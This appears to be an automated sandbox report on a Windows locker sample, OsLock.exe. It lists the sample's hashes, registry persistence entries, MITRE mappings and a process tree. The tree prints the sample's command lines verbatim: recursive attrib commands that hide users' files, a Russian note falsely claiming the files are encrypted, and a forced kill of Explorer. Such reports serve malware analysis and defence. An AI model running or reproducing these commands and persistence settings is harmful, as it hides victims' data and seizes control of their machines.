Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22/11/2024, 09:20
Static task
static1
Behavioral task
behavioral1
Sample
OsLock.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
OsLock.exe
Resource
win10v2004-20241007-en
General
-
Target
OsLock.exe
-
Size
385KB
-
MD5
675ea787630f596da0474830ffb49723
-
SHA1
c8e18cbc3cca1ded47eb5860a71b9f22d46409e1
-
SHA256
ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf
-
SHA512
fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d
-
SSDEEP
6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe -
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini attrib.exe -
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_1 = "AWindowsService.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_2 = "taskhost.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_6 = "native.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsInstaller = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" -startup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSEdgeUpdateX = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\"" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\System3264Wow = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --init" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\OneDrive10293 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" /setup" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\WINDOWS = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\OsLock.exe\" --wininit" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_3 = "windowsx-c.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_4 = "System.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_5 = "_default64.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_7 = "ux-cryptor.exe" OsLock.exe Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\WIN32_8 = "crypt0rsx.exe" OsLock.exe -
Drops desktop.ini file(s) 45 IoCs
description ioc Process File opened for modification C:\Users\Admin\Documents\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4TDQSVWU\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SEGJVAZC\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Music\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\1U7Y9BT8\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\4KNYJNXZ\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini attrib.exe File opened for modification C:\Users\Public\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Documents\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Links\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\5O2ZS8DL\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BBWU148F\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G0UQMQ1C\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini attrib.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3692679935-4019334568-335155002-1000\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Searches\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ADWO43R6\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini attrib.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini attrib.exe File opened for modification C:\Users\Admin\Videos\desktop.ini attrib.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
pid Process 3004 cmd.exe 2456 cmd.exe 2720 cmd.exe 2836 cmd.exe 2928 cmd.exe 2872 cmd.exe -
Kills process with taskkill 1 IoCs
pid Process 2748 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2792 OsLock.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2792 OsLock.exe Token: SeDebugPrivilege 2748 taskkill.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2836 2792 OsLock.exe 30 PID 2792 wrote to memory of 2836 2792 OsLock.exe 30 PID 2792 wrote to memory of 2836 2792 OsLock.exe 30 PID 2792 wrote to memory of 2720 2792 OsLock.exe 31 PID 2792 wrote to memory of 2720 2792 OsLock.exe 31 PID 2792 wrote to memory of 2720 2792 OsLock.exe 31 PID 2792 wrote to memory of 2456 2792 OsLock.exe 32 PID 2792 wrote to memory of 2456 2792 OsLock.exe 32 PID 2792 wrote to memory of 2456 2792 OsLock.exe 32 PID 2792 wrote to memory of 3004 2792 OsLock.exe 33 PID 2792 wrote to memory of 3004 2792 OsLock.exe 33 PID 2792 wrote to memory of 3004 2792 OsLock.exe 33 PID 2792 wrote to memory of 2872 2792 OsLock.exe 34 PID 2792 wrote to memory of 2872 2792 OsLock.exe 34 PID 2792 wrote to memory of 2872 2792 OsLock.exe 34 PID 2792 wrote to memory of 2928 2792 OsLock.exe 35 PID 2792 wrote to memory of 2928 2792 OsLock.exe 35 PID 2792 wrote to memory of 2928 2792 OsLock.exe 35 PID 2792 wrote to memory of 2748 2792 OsLock.exe 36 PID 2792 wrote to memory of 2748 2792 OsLock.exe 36 PID 2792 wrote to memory of 2748 2792 OsLock.exe 36 PID 3004 wrote to memory of 2712 3004 cmd.exe 44 PID 3004 wrote to memory of 2712 3004 cmd.exe 44 PID 3004 wrote to memory of 2712 3004 cmd.exe 44 PID 2872 wrote to memory of 2724 2872 cmd.exe 45 PID 2872 wrote to memory of 2724 2872 cmd.exe 45 PID 2872 wrote to memory of 2724 2872 cmd.exe 45 PID 2872 wrote to memory of 2832 2872 cmd.exe 46 PID 2872 wrote to memory of 2832 2872 cmd.exe 46 PID 2872 wrote to memory of 2832 2872 cmd.exe 46 PID 3004 wrote to memory of 2608 3004 cmd.exe 47 PID 3004 wrote to memory of 2608 3004 cmd.exe 47 PID 3004 wrote to memory of 2608 3004 cmd.exe 47 PID 2928 wrote to memory of 2596 2928 cmd.exe 48 PID 2928 wrote to memory of 2596 2928 cmd.exe 48 PID 2928 wrote to memory of 2596 2928 cmd.exe 48 PID 2836 wrote to memory of 2440 2836 cmd.exe 49 PID 2836 wrote to memory of 2440 2836 cmd.exe 49 PID 2836 wrote to memory of 2440 2836 cmd.exe 49 PID 2836 wrote to memory of 2600 2836 cmd.exe 50 PID 2836 wrote to memory of 2600 2836 cmd.exe 50 PID 2836 wrote to memory of 2600 2836 cmd.exe 50 PID 2456 wrote to memory of 2304 2456 cmd.exe 51 PID 2456 wrote to memory of 2304 2456 cmd.exe 51 PID 2456 wrote to memory of 2304 2456 cmd.exe 51 PID 2720 wrote to memory of 1660 2720 cmd.exe 52 PID 2720 wrote to memory of 1660 2720 cmd.exe 52 PID 2720 wrote to memory of 1660 2720 cmd.exe 52 PID 2456 wrote to memory of 2612 2456 cmd.exe 53 PID 2456 wrote to memory of 2612 2456 cmd.exe 53 PID 2456 wrote to memory of 2612 2456 cmd.exe 53 PID 2720 wrote to memory of 2252 2720 cmd.exe 54 PID 2720 wrote to memory of 2252 2720 cmd.exe 54 PID 2720 wrote to memory of 2252 2720 cmd.exe 54 PID 2928 wrote to memory of 1168 2928 cmd.exe 55 PID 2928 wrote to memory of 1168 2928 cmd.exe 55 PID 2928 wrote to memory of 1168 2928 cmd.exe 55 -
Views/modifies file attributes 1 TTPs 12 IoCs
pid Process 2252 attrib.exe 2596 attrib.exe 2440 attrib.exe 2600 attrib.exe 1660 attrib.exe 2304 attrib.exe 1168 attrib.exe 2724 attrib.exe 2712 attrib.exe 2832 attrib.exe 2608 attrib.exe 2612 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\OsLock.exe"C:\Users\Admin\AppData\Local\Temp\OsLock.exe"1⤵
- Modifies WinLogon for persistence
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Windows\system32\cmd.execmd.exe /c F: & attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2440
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2600
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:1660
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2252
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2304
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2612
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2712
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2608
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2724
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:2832
-
-
-
C:\Windows\system32\cmd.execmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt2⤵
- Hide Artifacts: Hidden Files and Directories
- Suspicious use of WriteProcessMemory
PID:2928 -
C:\Windows\system32\attrib.exeattrib +h +s +r +i /D /S *3⤵
- Drops startup file
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:2596
-
-
C:\Windows\system32\attrib.exeattrib -h +s +r info-lox.txt3⤵
- Views/modifies file attributes
PID:1168
-
-
-
C:\Windows\system32\taskkill.exetaskkill.exe /im Explorer.exe /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6B
MD5077e9aa9444bcf28541070cd97c81aa6
SHA12852e06b451e586b90203eae63c90c5d770214be
SHA256859dba5497589ef1afb7e49275e3f3304ed1cad7412decbd56248002d904f0c2
SHA512063d675dc30a33e99d63ac842b367ed35d0cd1e336058f4bfe8eb53e5e99797af196e311c7898935c7f8202c75cdda971187c1ec5f850f02780ac161c935291e
-
Filesize
56B
MD5aeaa91ff5575a8dde8fba70e66040648
SHA1917769bed9179d32dd0acd7114c2ddfd4ef4baf3
SHA25683129a453e70013d996f9b1acc3ecf4a1e8199d934ccbaedd0d8ec80457bc8f6
SHA5120eb06705ec330f018f5992a40b858c975cf236d86970f580e275218d1a6f9a145c2503a5b5f1918894cac43673729a94e2a42dfc4173cc6c99ac965f6b2b358b